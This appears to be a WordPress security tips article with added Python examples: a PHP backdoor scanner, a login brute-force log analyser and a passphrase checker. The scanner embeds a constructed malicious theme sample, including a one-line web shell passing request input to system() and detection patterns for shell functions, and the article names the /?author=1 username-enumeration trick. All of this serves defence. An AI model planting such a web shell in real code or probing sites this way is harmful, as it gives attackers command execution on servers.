Neglecting updates is the most common WordPress security mistake, but it is far from the only one. Several other habits, covered below, also leave your site open to attack.
Because WordPress is open source, anyone, including attackers, can read the code of core, plugins and themes and study it for weaknesses. Combine that with WordPress's popularity and a single working exploit can be pointed at millions of sites, so every installation is a target whether or not it is interesting in itself.
The good news is you don’t have to do anything drastic, like switching to a much less user-friendly CMS that lacks the free plugins and themes you rely on. You just have to follow these tips to batten down your site and reduce your exposure to attack.
Lacking a First Line of Defense: No Security Plugin
There are many security plugins to choose from at different prices, including some free options. While it’s true that having too many plugins is a bad idea, installing one that actually protects your site is a no-brainer.
This list of the Top 10 Essential WordPress Plugins is a good place to start. It includes Wordfence, a personal favorite of mine. A good security plugin adds a layer of protection against the most common attacks: it rate-limits and blocks login attempts, scans plugin and theme files for malware, and filters known exploit patterns before they reach WordPress. It does not replace updates or the other habits below, but it takes care of the noisiest threats so you can get on with running your business.
Installing Bad Plugins and Themes
If a plugin you would normally have to pay for is offered somewhere for free, consider this a giant red flag. A pirated plugin or theme may cost nothing up front, but it can cost you your whole site.
Disreputable plugins and themes come with a catch. Not only are they dishonest and steal from hard-working developers, they are frequently repackaged with injected code: an obfuscated loader, a hidden administrator account, or a web shell that lets the attacker run commands on your server. Once installed, that code runs with the full privileges of your site and functions as a backdoor, and it keeps working through every WordPress update until the file itself is removed.
Beware also of WordPress themes that look totally safe. If a theme isn’t from the WordPress Theme Directory, or from a source you know and trust, don’t install it. Themes in the directory are reviewed against its guidelines before they are listed, which includes checking for unsafe code, so they are a far safer default than a zip file from an unknown site. They can still develop vulnerabilities later, so keep them updated like everything else.
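As an added example (not code from the original post or from any plugin it names), the script below shows what "checking for unsafe code" looks like in practice: a heuristic scan of PHP files for the constructs that injected WordPress backdoors rely on, plus decoding of base64 string literals so you can see what an eval() would actually run. The two PHP sources are constructed for this example; the pattern list is a starting point, not a complete malware signature set.

```python
import base64
import re

# Constructed sample files, written for this example; they are not taken from
# any real plugin or theme. The first imitates the loader a "nulled" theme
# typically ships with, the second is ordinary plugin code.
NULLED_FOOTER = r"""<?php
/* Theme footer */
$_x = "ZWNobyAnaGVsbG8nOw==";
eval(base64_decode($_x));
if (isset($_REQUEST['cmd'])) { system($_REQUEST['cmd']); }
"""

CLEAN_PLUGIN = r"""<?php
/* Plugin Name: Hello Example */
function hello_example_shortcode($atts) {
    $atts = shortcode_atts(array('name' => 'world'), $atts);
    return esc_html('Hello, ' . $atts['name']);
}
add_shortcode('hello_example', 'hello_example_shortcode');
"""

# Constructs that are common in injected WordPress backdoors and rare in honest
# plugin code. Every hit is a heuristic: a reason to read the file, not proof.
SUSPICIOUS_PATTERNS = {
    "eval of a decoded/obfuscated payload": re.compile(
        r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(", re.I),
    "request input passed straight to eval or a shell": re.compile(
        r"\b(?:eval|assert|system|exec|shell_exec|passthru|popen)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b", re.I),
    "preg_replace with the /e modifier (executes the replacement)": re.compile(
        r"preg_replace\s*\(\s*['\"][^'\"]+/[a-z]*e[a-z]*['\"]", re.I),
    "variable function name called with request input": re.compile(
        r"\$\w+\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b", re.I),
    "long base64 literal": re.compile(r"['\"][A-Za-z0-9+/]{80,}={0,2}['\"]"),
}

B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{16,}={0,2})['\"]")


def scan_php(source):
    """Return (line_number, label, matched_text) for every suspicious construct found."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for label, pattern in SUSPICIOUS_PATTERNS.items():
            match = pattern.search(line)
            if match:
                findings.append((lineno, label, match.group(0)))
    return findings


def reveal_base64_literals(source):
    """Decode base64-looking string literals so the analyst can see what an eval() would run."""
    revealed = []
    for match in B64_LITERAL.finditer(source):
        try:
            decoded = base64.b64decode(match.group(1), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64, or binary: leave it for manual review
        if decoded.isprintable():
            revealed.append(decoded)
    return revealed


if __name__ == "__main__":
    for name, source in (("nulled footer", NULLED_FOOTER), ("clean plugin", CLEAN_PLUGIN)):
        print(f"== {name} ==")
        for lineno, label, text in scan_php(source):
            print(f"  line {lineno}: {label}: {text}")
        for payload in reveal_base64_literals(source):
            print(f"  hidden payload: {payload!r}")
```

Run it over an extracted plugin or theme before activating it (walk the directory and feed each .php file to scan_php). A clean file may still be malicious in ways these patterns miss, but a hit on a freshly downloaded "free" premium theme is reason enough to delete it.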
Surfing In Public Wi-Fi Waters
Sure, you’ve heard it all before, but do you actually avoid logging in to your site, or typing any other credentials, while on a public Wi-Fi hotspot? Airports, libraries, hotels, cafés and, of course, Starbucks all count.
The reason attackers can steal your information so easily is that, according to Public WiFi, public WiFi networks are “almost always unencrypted, which means that anyone with cheap, easily available software can listen in and access everything being sent over the network.”
The attacks possible on a public WiFi hotspot include sniffers, evil twin access points, man-in-the-middle attacks, and sidejacking (stealing the session cookie of an account you are already logged in to). The names alone should be enough to steer you away from exposing your website login and other information there. The practical protection, on any network, is to serve wp-login.php and all of wp-admin over HTTPS (WordPress can force this with the FORCE_SSL_ADMIN setting in wp-config.php) and to use a VPN when you have no choice but to work from a hotspot.
Using “Admin” For Your Username
Older WordPress installers created the first account with the username “admin”, and many one-click installers from hosting companies still do. That account has the Administrator role, whose permissions are commonly referred to as admin and allow the user to do anything at all. An Administrator has total power over the website, including deleting the whole site.
The last thing you want is to keep “admin” as the username of the account with total access. It is the first username an attacker tries when breaking into a site. Once they know your username, all they have to do is guess your password: with admin still intact you have handed over half of the login. See the list of targeted usernames in the recent brute-force attack here. Clearly admin is a common guess. Attackers can also confirm usernames without guessing: on a default install, requesting /?author=1 redirects to /author/<username>/, which reveals the username of the first account.
You can do one of two things:
- Remove the admin account. Before you do, create a new user with the Administrator role and log in as that user; then delete the old admin user, choosing to attribute its posts and pages to the new account when WordPress asks.
- If you would rather do it in cPanel, read this user-friendly post on How To Change Your Username. If I can do it, you can too.
The Wordfence plugin lets you block any IP address and limit login attempts, so if you find one address continually trying to log in as admin, block it.
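Blocking an address that keeps hammering the login page is easier when you can see the pattern in your web server log. As an added example (not from the original post, and not Wordfence's own logic), the script below parses constructed Apache combined-format log lines, flags addresses with a burst of failed wp-login.php POSTs and addresses probing /?author=N, and renders an Apache 2.4 deny block for them. It relies on two WordPress behaviours: a failed login re-renders the form with HTTP 200 while a successful one answers 302 to wp-admin, and author-archive probes redirect to /author/<username>/. The IP addresses are from documentation ranges; the thresholds are assumptions you should tune for your traffic.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed Apache "combined" log lines written for this example. 203.0.113.7
# enumerates the first author and then fires six wrong passwords in nine seconds;
# 198.51.100.4 is a real user who mistypes once and then succeeds (302);
# 192.0.2.9 fails three times spread over eight minutes.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2015:12:00:01 +0000] "GET /?author=1 HTTP/1.1" 301 0 "-" "python-requests/2.5.1"
203.0.113.7 - - [10/Mar/2015:12:00:03 +0000] "POST /wp-login.php HTTP/1.1" 200 3410 "-" "python-requests/2.5.1"
203.0.113.7 - - [10/Mar/2015:12:00:04 +0000] "POST /wp-login.php HTTP/1.1" 200 3410 "-" "python-requests/2.5.1"
198.51.100.4 - - [10/Mar/2015:12:00:05 +0000] "POST /wp-login.php HTTP/1.1" 200 3410 "https://example.com/wp-login.php" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2015:12:00:06 +0000] "POST /wp-login.php HTTP/1.1" 200 3410 "-" "python-requests/2.5.1"
203.0.113.7 - - [10/Mar/2015:12:00:07 +0000] "POST /wp-login.php HTTP/1.1" 200 3410 "-" "python-requests/2.5.1"
198.51.100.4 - - [10/Mar/2015:12:00:09 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "https://example.com/wp-login.php" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2015:12:00:10 +0000] "POST /wp-login.php HTTP/1.1" 200 3410 "-" "python-requests/2.5.1"
203.0.113.7 - - [10/Mar/2015:12:00:12 +0000] "POST /wp-login.php HTTP/1.1" 200 3410 "-" "python-requests/2.5.1"
192.0.2.9 - - [10/Mar/2015:12:01:00 +0000] "POST /wp-login.php HTTP/1.1" 200 3410 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Mar/2015:12:05:00 +0000] "POST /wp-login.php HTTP/1.1" 200 3410 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Mar/2015:12:09:00 +0000] "POST /wp-login.php HTTP/1.1" 200 3410 "-" "Mozilla/5.0"
"""

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def parse(lines):
    """Yield (ip, timestamp, method, path, status) for each well-formed combined-log line."""
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["time"], "%d/%b/%Y:%H:%M:%S %z")
        yield m["ip"], ts, m["method"], m["path"], int(m["status"])


def find_bruteforcers(lines, threshold=5, window_seconds=60):
    """Map IP -> peak count of failed wp-login.php POSTs inside any sliding window."""
    failures = defaultdict(list)
    for ip, ts, method, path, status in parse(lines):
        # A wrong password re-renders the login form with 200; success is a 302.
        if method == "POST" and path.split("?")[0] == "/wp-login.php" and status == 200:
            failures[ip].append(ts)
    flagged = {}
    for ip, times in failures.items():
        times.sort()
        peak, start = 0, 0
        for end in range(len(times)):
            while (times[end] - times[start]).total_seconds() > window_seconds:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


def find_enumerators(lines):
    """IPs probing author archives; /?author=N redirects to /author/<username>/ on a default install."""
    probes = set()
    for ip, _ts, method, path, status in parse(lines):
        if method == "GET" and re.search(r"[?&]author=\d+", path) and status in (301, 302):
            probes.add(ip)
    return probes


def htaccess_deny(ips):
    """Render an Apache 2.4 block refusing the given addresses (Wordfence's IP block list does the same from the dashboard)."""
    rules = "\n".join(f"    Require not ip {ip}" for ip in sorted(ips))
    return "<RequireAll>\n    Require all granted\n" + rules + "\n</RequireAll>\n"


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    brute = find_bruteforcers(lines)
    print("brute-force sources:", brute)
    print("username enumeration:", find_enumerators(lines))
    print(htaccess_deny(set(brute) | find_enumerators(lines)))
```

On a real server, feed it the access log (`find_bruteforcers(open("/var/log/apache2/access.log"))`) and review the flagged addresses before blocking; a shared office NAT can legitimately produce several failed logins in a minute, so the threshold is a judgement call, not a constant.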
Using Really Obvious Passwords
The list of top passwords for 2014 contains the same weak passwords as every year, with “123456” and “password” holding the top two spots. It appears that all the advice on the internet about using strong passwords is going unheeded.
Use your imagination when creating passwords and follow Google’s tips, use a password generator, or take Edward Snowden’s advice to John Oliver and use passphrases that are easy for you to remember but hard for computers to guess. Use a different password for every account, and try one of the top five password managers so you don’t have to remember them all.
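To put numbers on “easy to remember, hard for computers”, here is an added example (not from the original post) that compares the entropy of a six-word diceware-style passphrase with an eight-character mixed-case-and-digit password, generates a passphrase with the operating system's cryptographic random source, and rejects candidates that appear in a common-password list. The word list and the common-password excerpt are constructed for the example; a real deployment would use a full published word list and a full breached-password corpus, as noted in the comments.

```python
import math
import secrets

# Constructed excerpt of a common-password list for this example. The post's
# 2014 ranking puts "123456" and "password" in the top two spots; a real check
# should load a full corpus such as the Have I Been Pwned password list.
COMMON_PASSWORDS = {
    "123456", "password", "12345", "12345678", "qwerty",
    "123456789", "1234", "baseball", "dragon", "football",
}

# Tiny word list so the example runs offline; it is NOT large enough for real
# use. Real passphrases should draw from a published list such as the EFF long
# word list (7776 words), which is the size the entropy comparison below assumes.
DEMO_WORDS = (
    "anchor", "basket", "candle", "dolphin", "ember", "falcon", "garden", "harbor",
    "island", "jigsaw", "kettle", "lantern", "meadow", "nectar", "orchid", "pebble",
)
DICEWARE_SIZE = 7776


def entropy_bits(choices_per_position, positions):
    """Bits of entropy for `positions` independent uniform picks from `choices_per_position` options."""
    return positions * math.log2(choices_per_position)


def generate_passphrase(word_count=6, words=DEMO_WORDS, separator="-"):
    """Pick words with the OS CSPRNG via `secrets`, never with `random.random`."""
    return separator.join(secrets.choice(words) for _ in range(word_count))


def password_problems(password, min_length=12):
    """Return the reasons a candidate should be rejected; an empty list means it passed these checks."""
    problems = []
    lowered = password.lower()
    # Catch the list entries plus the usual "add a 1 or ! at the end" variants.
    if lowered in COMMON_PASSWORDS or lowered.rstrip("!1") in COMMON_PASSWORDS:
        problems.append("appears in the common-password list")
    if len(password) < min_length:
        problems.append(f"shorter than {min_length} characters")
    if len(set(password)) <= 3:
        problems.append("uses only a handful of distinct characters")
    return problems


if __name__ == "__main__":
    print(f"6 words from a 7776-word list: {entropy_bits(DICEWARE_SIZE, 6):.1f} bits")
    print(f"8 chars from upper+lower+digits: {entropy_bits(62, 8):.1f} bits")
    print("example passphrase:", generate_passphrase())
    for candidate in ("123456", "Password1", "anchor-basket-candle-dolphin-ember-falcon"):
        print(f"{candidate!r} -> {password_problems(candidate) or 'ok'}")
```

Six random words from a 7776-word list carry about 77.5 bits of entropy against roughly 47.6 bits for a random eight-character password that is far harder to remember; the words only help if they are actually chosen at random, which is why the generator uses `secrets` rather than letting a human pick “favorite” words.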
You can always sign up for a managed WordPress plan with your web hosting company and let them handle updates, backups and malware scanning for you. That does not take the accounts, passwords and plugins you add off your plate, but if you’re running a small business it’s a huge timesaver. Good luck: it’s a Digital Wild West out there.